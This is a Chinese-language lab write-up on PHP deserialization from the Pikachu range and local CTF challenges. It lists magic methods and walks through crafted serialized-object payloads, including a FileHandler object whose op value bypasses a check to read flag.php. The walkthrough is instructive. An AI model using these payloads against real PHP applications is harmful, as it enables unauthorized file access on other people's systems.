发布时间:2023-08-26 15:00
Pikachu反序列化
serialize() //将一个对象转换成一个字符串
unserialize() //将字符串还原成一个对象
触发:unserialize函数的变量可控,文件中存在可利用的类,类中有魔术方法:
__construct()//创建对象时触发
__destruct() //对象被销毁时触发
__call() //在对象上下文中调用不可访问的方法时触发
__callStatic() //在静态上下文中调用不可访问的方法时触发
__get() //用于从不可访问的属性读取数据
__set() //用于将数据写入不可访问的属性
__isset() //在不可访问的属性上调用isset()或empty()触发
__unset() //在不可访问的属性上使用unset()时触发
__invoke() //当脚本尝试将对象调用为函数时触发
https://c.runoob.com/compile/1/
序列化:
$a=\'abc\';
echo serialize($a);
?>
反序列化:
$b=\'s:3:\"abc\";\';
echo unserialize($b);
?>
class S{
var $test=\"pikachu\";
function __construct(){
echo $thie->test;
}
}
$aa =new S();
echo serialize($aa);
?>
序列化
class MM{
var $test=\"pikachu\";
function __construct(){
echo \"hello world\";
}
}
$sss = new MM();
echo serialize($sss);
?>
输入语句:O:1:\"S\":1:{s:4:\"test\";s:29:\"\";}
输入语句: O:1:\"S\":1:{s:4:\"test\";s:7:\"pikachu\";}
CTF实验
访问http://192.168.249.1/ctf/ctf.php
序列化
$KEY = \"hahaha\";
echo serialize($KEY);
?>
http://192.168.249.1/ctf/ctf.php?str=s:6:%22hahaha%22; 反序列化成功
访问http://192.168.249.1/ctf2/ctf2.php
访问http://192.168.249.1/ctf2/ctf2.php?aaa=111 挂代理抓包
发送到批量破解
选择4位字符 4 letter words
破解出hint
访问http://192.168.249.1/ctf2/ctf2.php?hint=111
s:21:\"ISecer:www.isecer.com\";
添加一个cookie
访问http://192.168.249.1/ctf2/ctf2.php
s:0:\"\"; 空值反序列化
修改ISecer的cookie值
访问http://192.168.249.1/ctf2/ctf2.php
访问http://192.168.249.1/ctf3/
s:5:\"11111\"; 得出序列化值
访问http://192.168.249.1/ctf3/?str=s:5:%2211111%22; 正确反序列化
访问http://192.168.249.1/ctf3/?str=111 纯数字化 不行
class FileHandler {
public $op = \'1\';
public $filename = \'flag.php\';
public $content = \'Hello World!\';
}
$aaa = new FileHandler();
echo serialize($aaa);
?>
得到:
O:11:\"FileHandler\":3:{s:2:\"op\";s:1:\"1\";s:8:\"filename\";s:8:\"flag.php\";s:7:\"content\";s:12:\"Hello World!\";}
访问str= O:11:\"FileHandler\":3:{s:2:\"op\";s:1:\"4\";s:8:\"filename\";s:8:\"flag.php\";s:7:\"content\";s:12:\"Hello World!\";}
http://192.168.249.1/ctf3/?str=O:11:%22FileHandler%22:3:{s:2:%22op%22;s:1:%224%22;s:8:%22filename%22;s:8:%22flag.php%22;s:7:%22content%22;s:12:%22Hello%20World!%22;}
访问str= O:11:\"FileHandler\":3:{s:2:\"op\";s:1:\"1\";s:8:\"filename\";s:8:\"flag.php\";s:7:\"content\";s:12:\"Hello World!\";}
http://192.168.249.1/ctf3/?str=O:11:%22FileHandler%22:3:{s:2:%22op%22;s:1:%221%22;s:8:%22filename%22;s:8:%22flag.php%22;s:7:%22content%22;s:12:%22Hello%20World!%22;}
class FileHandler {
public $op = \' 2\';
public $filename = \'flag.php\';
public $content = \'\';
}
$aaa = new FileHandler();
echo serialize($aaa)
?>
得到:O:11:\"FileHandler\":3:{s:2:\"op\";s:2:\" 2\";s:8:\"filename\";s:8:\"flag.php\";s:7:\"content\";s:0:\"\";}
切换版本
访问http://192.168.249.1/ctf3/?str=O:11:%22FileHandler%22:3:{s:2:%22op%22;s:2:%22%202%22;s:8:%22filename%22;s:8:%22flag.php%22;s:7:%22content%22;s:0:%22%22;}
修改flag.php
访问http://192.168.249.1/ctf3/?str=O:11:%22FileHandler%22:3:{s:2:%22op%22;s:2:%22%202%22;s:8:%22filename%22;s:8:%22flag.php%22;s:7:%22content%22;s:0:%22%22;}
修改index.php
再访问